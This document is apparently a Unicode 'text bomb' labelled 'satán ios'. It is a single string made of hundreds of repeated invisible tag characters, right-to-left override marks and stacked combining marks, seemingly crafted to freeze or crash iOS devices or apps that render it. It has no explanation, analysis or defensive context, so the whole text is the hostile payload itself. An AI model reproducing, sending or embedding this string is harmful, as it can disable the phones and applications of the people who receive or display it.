`叓satán叓ios🍏叓👹叓. 厷༾༾󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 